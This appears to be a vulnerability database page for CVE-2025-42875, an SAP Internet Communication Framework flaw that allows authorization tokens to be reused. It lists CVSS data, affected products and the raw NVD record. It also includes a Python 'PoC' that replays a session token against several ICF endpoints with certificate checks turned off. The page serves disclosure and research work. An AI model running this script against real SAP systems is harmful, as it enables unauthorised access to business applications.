Security Vulnerability Report
中文
CVE-2025-42875 CVSS 6.6 MEDIUM

CVE-2025-42875

Published: 2025-12-09 16:17:52
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The SAP Internet Communication Framework does not conduct any authentication checks for features that need user identification allowing an attacker to reuse authorization tokens, violating secure authentication practices causing low impact on Confidentiality, Integrity and Availability of the application.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SAP Internet Communication Framework (ICF) - 特定版本待SAP官方披露
SAP NetWeaver AS ABAP - 所有未安装安全补丁3591163的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-42875 PoC - SAP ICF Authentication Bypass via Token Reuse # Target: SAP Internet Communication Framework # Note: This PoC demonstrates the token reuse attack vector def exploit_sap_icf(target_url, valid_token): """ Exploit SAP ICF by reusing authorization tokens """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Cookie': f'SAP_SESSIONID={valid_token}', 'X-Requested-With': 'XMLHttpRequest' } # Target ICF endpoints that require user identification targets = [ f'{target_url}/sap/public/icf_info', f'{target_url}/sap/bc/icf_info', f'{target_url}/sap/opu/odata/sap/user_info' ] for endpoint in targets: try: response = requests.get(endpoint, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f'[+] Successfully accessed: {endpoint}') print(f' Response length: {len(response.content)} bytes') elif response.status_code == 401: print(f'[-] Authentication required: {endpoint}') else: print(f'[*] Unexpected response: {endpoint} - Status: {response.status_code}') except requests.RequestException as e: print(f'[-] Error accessing {endpoint}: {str(e)}') if __name__ == '__main__': if len(sys.argv) < 3: print(f'Usage: python {sys.argv[0]} <target_url> <valid_token>') print('Example: python exploit.py https://sap.example.com:50000 ABC123DEF456') sys.exit(1) target = sys.argv[1] token = sys.argv[2] exploit_sap_icf(target, token)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-42875", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:51.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SAP Internet Communication Framework does not conduct any authentication checks for features that need user identification allowing an attacker to reuse authorization tokens, violating secure authentication practices causing low impact on Confidentiality, Integrity and Availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://me.sap.com/notes/3591163", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.